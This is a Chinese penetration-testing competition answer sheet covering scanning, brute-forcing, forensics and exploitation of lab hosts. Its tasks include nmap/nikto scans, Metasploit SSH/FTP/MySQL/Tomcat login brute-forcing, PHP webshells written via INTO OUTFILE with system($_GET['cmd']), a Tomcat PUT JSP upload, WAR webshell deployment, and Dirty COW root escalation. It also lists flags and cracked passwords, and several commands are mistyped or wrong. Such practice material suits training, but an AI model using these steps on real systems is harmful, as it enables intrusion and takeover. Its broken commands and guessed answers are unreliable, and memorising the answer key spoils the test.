任务一:namp扫描测试
- 1.在本地PC渗透测试平台Kali中使用nmap工具查看本地路由与接口,并将该操作使用的全部命令作为FLAG提交;
nmap --iflist 172.16.101.250
- 2.通过本地PC中渗透测试平台Kali对服务器场景Linux进行VNC服务扫描渗透测试,并将使用的脚本名称作为FLAG提交(例mysql-brute.nse);
nmap --script vnc-brute.nse - p 5900 172.16.101.250
vnc-info.nse
- 3.通过本地PC中渗透测试平台Kali对服务器场景Linux进行VNC服务扫描渗透测试,并将该操作显示结果中VNC版本号作为FLAG提交;
nmap --script vnc-brute -A 5900 172.16.101.250
可能是 nmap --script vnc-info.nse 172.16.101.250
- 4.在本地PC渗透测试平台Kali中使用nmap发送空的UDP数据对类DNS服务avahi进行拒绝服务攻击,并将使用的脚本名称作为FLAG提交(例mysql-brute.nse);
nmap -broadcast-avahi-dos.nes 172.16.101.250
- 5.通过本地 PC 中渗透测试平台 Kali 对服务器场景 Linux 进行模糊测试,来发送异常的包到靶机服务器,探测出隐藏在服务器中的漏洞 ,并将使用的脚本名称作为 FLAG 提交(例 mysql-brute.nse);
nmap --script dns-fuzz.nse 172.16.101.250
- 6.在本地 PC 渗透测试平台 Kali 中使用 zenmap 工具扫描服务器场景可能存在远程任意代码执行漏洞,并将使用的脚本名称的字符串作为 FLAG 提交; (例mysql-brute.nse);
nmap --script http-shellshock.nse 172.16.101.250
- 7.在本地PC渗透测试平台Kali中使用zenmap工具扫描服务器场景可能存在远程任意代码执行漏洞(提示:检测路径为/cgi-bin/bin,需添加–script-args uri=/cgi-bin/bin参数),并将该操作显示结果中漏洞编号和发布时间作为FLAG提交(漏洞编号和发布时间的字符串之间以分号隔开)。
nmap -sV -p- --script http-shellshock --script-args uri=cgi-binbin,cmd=ls 192.168.3.0/24
任务二、nmap扫描渗透测试2
- 1.通过本地PC中渗透测试平台Kali对服务器场景Linux进行Web扫描渗透测试(使用工具nikto,查看该命令的完整帮助文件),并将该操作使用命令中固定不变的字符串作为Flag提交;
nikto -H
- 2.通过本地PC中渗透测试平台Kali对服务器场景Linux进行Web扫描渗透测试(使用工具nikto,扫描目标服务器8080端口,检测其开放状态),并将该操作使用命令中固定不变的字符串作为Flag提交(目标地址以http://10.10.10.1来表示);
nikto -h http://10.10.10.1:8080
nikto -h 172.16.101.250 -p 8080
- 3.通过本地PC中渗透测试平台Kali对服务器场景Linux进行Web扫描渗透测试(使用工具nikto,扫描目标服务器80端口),将回显信息中apache服务的版本参数作为flag提交;
nikto -h 172.16.101.250
Apache/2.2.15 (CentOS)
- 4.通过本地PC中渗透测试平台Kali对服务器场景Linux进行Web扫描渗透测试(使用工具nikto,扫描目标服务器80端口),将回显信息中php的版本参数作为flag提交;
PHP/5.3.3
- 5.通过本地PC中渗透测试平台Kali对服务器场景Linux进行Web扫描渗透测试(使用工具nikto,扫描cgi-bin目录的文件),将该操作使用的命令中固定不变的字符串作为Flag(目标地址以:http://10.10.10.1来表示)提交;
目录扫描
nikto -h http://10.10.10.1 -Cgidirs /cgi-bin/
nikto -Cgidirs cgi-bin -h http://172.16.101.250
- 6.通过本地PC中渗透测试平台Kali对服务器场景Linux进行Web扫描渗透测试,使用工具nikto并结合nmap的扫描结果进行扫描,首先使用nmap工具对靶机所在网段的80端口进行扫描,并将扫描结果以输出至所有格式的方式输出到指定文件target中,将输出至所有格式需要用到的参数作为flag提交;
oA
map - F -oA targer 172.16.101.250
- 7.通过本地PC中渗透测试平台Kali对服务器场景Linux进行Web扫描渗透测试,使用工具nikto扫描第六题生成的target文件中的网站,并将该操作使用的所有命令作为FLAG提交。
nikto -host target.gnmap
任务三:SSH弱口令渗透测试
- 1.在本地PC渗透测试平台BT5中使用zenmap工具扫描服务器场景Linux所在网段(例如:172.16.101.0/24)范围内存活的主机IP地址和指定开放的21、22、23端口。并将该操作使用的命令中必须要添加的字符串作为FLAG提交(忽略ip地址);
-p 21,22,23
nmap -sS 172.16.101.0/24 -p 21,22,23
- 2.通过本地PC中渗透测试平台BT5对服务器场景Linux进行系统服务及版本扫描渗透测试,并将该操作显示结果中SSH服务对应的服务端口信息作为FLAG提交;
22/tcp
nmap -O 172.16.101.250
- 3.在本地PC渗透测试平台BT5中使用MSF模块对其爆破,使用search命令,并将扫描弱口令模块的名称信息作为FLAG提交;
auxiliary/scanner/ssh/ssh_login
- 4.在上一题的基础上使用命令调用该模块,并查看需要配置的信息(使用show options命令),将回显中需要配置的目标地址,密码使用的猜解字典,线程,账户配置参数的字段作为FLAG提交(之间以英文逗号分隔,例hello,test,..,..);
RHOSTS,PASS_FILE,THREADS,USERNAME (ip地址,密码文件的地址,线程,用户名)
- 5.在msf模块中配置目标靶机IP地址,将配置命令中的前两个单词作为FLAG提交;
set RHOSTS
同上
- 6.在msf模块中指定密码字典,字典路径为/root/2.txt,用户名为test爆破获取密码并将得到的密码作为FLAG提交;
aaabc3
- 7.在上一题的基础上,使用第6题获取到的密码SSH到靶机,将test用户家目录中唯一一个后缀为.bmp图片的文件名的字符串作为FLAG提交。
ssh test@172.16.101.250
nauiwrevy
任务四:FTP弱口令渗透测试
1.在本地PC渗透测试平台BT5中使用zenmap工具扫描服务器场景Windows所在网段(例如:172.16.101.0/24)范围内存活的主机IP地址和指定开放的21、22、23端口。并将该操作使用的命令中必须要添加的字符串作为FLAG提交(忽略ip地址);
-p 21,22,23
2.通过本地PC中渗透测试平台BT5对服务器场景Windows进行系统服务及版本扫描渗透测试,并将该操作显示结果中FTP服务对应的服务端口信息作为FLAG提交;
21/tcp
3.在本地PC渗透测试平台BT5中使用MSF中模块对其爆破,使用search命令,并将扫描弱口令模块的名称信息作为FLAG提交;
auxiliary/scanner/ftp/ftp_login
4.在上一题的基础上使用命令调用该模块,并查看需要配置的信息(使用show options命令),将回显中需要配置的目标地址,密码使用的猜解字典,线程,账户配置参数的字段作为FLAG提交(之间以英文逗号分隔,例hello,test,..,..);
RHOSTS,PASS_FILE,THREADS,USERNAME
5.在msf模块中配置目标靶机IP地址,将配置命令中的前两个单词作为FLAG提交;
set RHOSTS
6.在msf模块中指定密码字典,字典路径为/root/2.txt,用户名为test爆破获取密码并将得到的密码作为FLAG提交;
133c31
7.在上一题的基础上,使用第6题获取到的密码登陆ftp服务,将该目录中flag2.bmp的图片文件中的英文单词作为FLAG提交。
sdfpsmdv
任务五:数据分析数字取证logs
- 使用Wireshark查看并分析Windows 7桌面下的logs.pcapng数据包文件,通过分析数据包logs.pcapng找出恶意用户目录扫描的第9个文件,并将该文件名作为FLAG(形式:[robots.txt])提交:
[star.php]
- 继续查看数据包文件logs.pcapng,分析出恶意用户扫描了哪些端口,并将全部的端口作为FLAG(形式:[端口名1,端口名2,端口名3…,端口名n])从低到高提交:
[21,80,445,1433,3306,3389,5000]
- 继续查看数据包文件logs.pcapng分析出恶意用户读取服务器的文件名是什么,并将该文件名作为FLAG(形式:[robots.txt])提交:
[name.txt]
注意读取文件大概分为两种
1.木马读取
1.1通过木马读取文件可以搜索木马上传成功之后的操作
2.MySQL读取
2.1MySQL读取文件可以通过搜索load_file函数查找
- 继续查看数据包文件logs.pcapng分析出恶意用户写入一句话木马的路径是什么,并将该路径作为FLAG(形式:[/root/whoami/])提交:
[C:/phpstudy/www/]
- 继续查看数据包文件logs.pcapng分析出恶意用户连接一句话木马的密码是什么,并将一句话密码作为FLAG(形式:[一句话密码])提交:
[007]
- 继续查看数据包文件logs.pcapng分析出恶意用户下载了什么文件,并将文件名及后缀作为FLAG(形式:[文件名.后缀名])提交:
[flag.zip]
- 继续查看数据包文件logs.pcapng将恶意用户下载的文件里面的内容作为FLAG(形式:[文件内容])提交:
[flag{Find You!}]
任务六 :数据分析数字取证-Bravo-1
- 分析Windows 7桌面下的Bravo-1.pcapng数据包文件,通过分析数据包Bravo-1.pcapng找出恶意用户目录扫描的第2个目录名,并将该目录名作为FLAG提交:
uploads
- 继续查看数据包文件Bravo-1.pcapng,分析出恶意用户通过哪个目录写入的一句话木马,并将该目录名作为FLAG提交:
phpmyadmin
- 继续查看数据包文件Bravo-1.pcapng分析出恶意用户读取了服务器什么文件,并将该文件名及后缀作为FLAG提交:
flag.txt
- 继续查看数据包文件Bravo-1.pcapng分析出恶意用户写入一句话木马的路径是什么,并将该路径作为FLAG提交:
c:/phpstudy/www/m/shell.php
- 继续查看数据包文件Bravo-1.pcapng分析出恶意用户连接一句话木马的密码是什么,并将一句话密码作为FLAG提交:
cia
- 继续查看数据包文件Bravo-1.pcapng分析出恶意用户下载了什么文件,并将文件名及后缀作为FLAG提交:
connect.php
- 继续查看数据包文件Bravo-1.pcapng将Web服务器连接的数据库名作为FLAG提交:
kingsman
任务七:tomcat中间件安全与加固
- 通过渗透机场景kali中的工具对web服务器进行扫描,浏览web服务器网页,在首页中找到tomcat服务版本号,并将其版本号作为flag提交;
7.0.79
- 已知此版本的tomcat具有上传漏洞,即向页面提交发送请求就会生成对应的文件。利用Burp Suite工具进行抓包,向网站首页位置提交内容为<%out.print(“hello”);%>文件名字为good.jsp的请求。将Burp Suite中的PUT请求作为flag提交(注:flag长度为16个单位长度);
PUT /good.jsp%20
- 通过msfconsole工具使用root目录下的的password.txt文件进行tomcat后台账户密码的破解,并将账户密码作为flag提交。(flag格式:账户_密码);
http://172.16.101.247:8080/manager
root_admin
root_zxcvbnm
search tomcat tomcat_login Tomcat_mgr_login
set rhosts ip
set rport 44444
set threads 5
- 用kali中的分离工具查看root目录下bm1.war文件中的flag文件,并将flag文件内容作为提交;
sdfgghjkl
- 通过第3题中的账户密码登陆网页(格式为服务器IP:8080/manager/html),将kali中root目录下的bm1.war文件上传后连接(连接地址为IP:8080/bm1/index.jsp)。在服务器中查找flag.txt文件,并将其内容作为flag提交;
wasdsaw
- 修改tomcat配置文件内容,使tomcat可以抵御第2题中的漏洞,将修改内容作为flag提交;
TRUE
任务八:mysql安全测试
172.16.101.249:8081
- 利用渗透机kali中的工具确定mysql的端口,将mysql端口作为flag提交;
3358
- 管理者曾在web界面登陆数据库,并执行了select ‘';system($_GET['cmd']); echo ''; ?>’ INTO OUTFILE ‘C:/phpstudy/WWW/test1.php’语句,结合本执行语句使用dos命令查看服务器的详细配置信息,并将服务器的系统型号作为flag提交;
Bochs
select ‘’
select ‘’ into outfile’C:/phpstudy/WWW/tes1.php’
- 利用渗透机kali中的msf工具使用root目录下password.txt字典文件破解MySQL的密码,并将破解mysql的密码所需的模块当作flag提交(账户为root);
mysql_login
- 利用渗透机kali中的msf工具使用root目录下password.txt字典文件破解MySQL的密码,并将mysql的密码当作flag提交(账户为root);
zxcvbnm
- 利用上题中的数据库账户密码在web界面登陆数据库,通过select ‘’************ ‘C:/phpstudy/WWW/shell.php’语句向服务器提交名为shell.php的一句话木马,将语句中号的明文作为flag提交(为大写字母或者空格);
INTO OUTFILE
- 使用菜刀连接上题中的shell.php,下载服务器根目录下的压缩包,将压缩包中的flag提交
huaixiaohai
任务九:利用python脚本进行web渗透测试
- 使用渗透机场景kali中工具扫描确定Web服务器场景地址,浏览网站flag.html页面,并将flag.html中的flag提交;
WXL0601
- 进入渗透机场景win7操作系统,完善桌面上的tupian.py文件,填写该文件当中空缺的FLAG1字符串,并将改字符串作为flag提交;
re
- 进入渗透机场景win7操作系统,完善桌面上的tupian.py文件,填写该文件当中空缺的FLAG2字符串,并将改字符串作为flag提交;
url
- 进入渗透机场景win7操作系统,完善桌面上的tupian.py文件,填写该文件当中空缺的FLAG3字符串,并将改字符串作为flag提交;
src
- 进入渗透机场景win7操作系统,完善桌面上的tupian.py文件,填写该文件当中空缺的FLAG字符串并运行成功文件会自动爬取网站tupian.php的图片,将爬取的图片数量作为flag提交;
29
- 结合网站的引导信息,参考源码再次将tupian.py进行修改,使tupian.py只爬取flag图片。再次运行tupian.py,并将修改的字符与爬取到的图片中的内容做为flag提交(提交格式为:修改的字符_图片内容);
BEIJINGANDBISAI
任务十:Linux操作系统渗透测试
通过本地PC中渗透测试平台Kali对服务器场景Linux进行操作系统扫描渗透测试,并将该操作显示结果“OS Details:”之后的字符串作为FLAG提交;
`nmap -O 172.16.101.250`
- 通过本地PC中渗透测试平台Kali对服务器场景Linux进行系统服务及版本扫描渗透测试,并将该操作显示结果中MySQL数据库对应的服务版本信息字符串作为FLAG提交;
nmap -A 172.16.101.250
- 通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试,将该场景/var/www/html目录中唯一一个后缀为.html文件的文件名称作为FLAG提交;
1、先爆破数据库密码,用九头蛇或者是msf
2、拿到密码插入一句话木马 select "" into outfile "/var/www/html/shell.php";
3、蚁剑连接就能看见
http://172.16.101.250/shell.php
- 通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试,将该场景/var/www/html目录中唯一一个后缀为.html文件的文件内容作为FLAG提交;
- 通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试,将该场景/root目录中唯一一个后缀为.bmp文件的文件名称作为FLAG提交;
- 通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试,将该场景/root目录中唯一一个后缀为.bmp的图片文件中的英文单词作为FLAG提交。
第二种方法,提权
1、爆破出test密码,
2、查看版本型号发现是2.6.32
3、在kali中查找exp
searchsploit COW | grep 2.6
40839.c
补全目录
locate linux/local/40839.c
uname -a
4、gcc编译
gcc -pthread exp.c -o exp -lcrypt
ls
./exp
设置密码
新账号firefart 密码:
任务十一:Windows操作系统渗透测试
- 通过本地PC中渗透测试平台Kali对服务器场景Windows进行操作系统扫描渗透测试,并将该操作显示结果“Running:”之后的字符串作为FLAG提交;
Microsoft Windows XP|2003
- 通过本地PC中渗透测试平台Kali对服务器场景Windows进行系统服务及版本扫描渗透测试,并将该操作显示结果中445端口对应的服务版本信息字符串作为FLAG提交;
microsoft-ds
- 通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,将该场景网络连接信息中的DNS信息作为FLAG提交;(例如114.114.114.114);
202.103.24.68
- 通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,将该场景桌面上111文件夹中唯一一个后缀为.docx文件的文件名称作为FLAG提交;
gbyuikvc
- 通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,将该场景桌面上111文件夹中唯一一个后缀为.docx文件的文档内容作为FLAG提交;
serbvuik
- 通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,将该场景桌面上222文件夹中唯一一个图片中的英文单词作为FLAG提交
presistence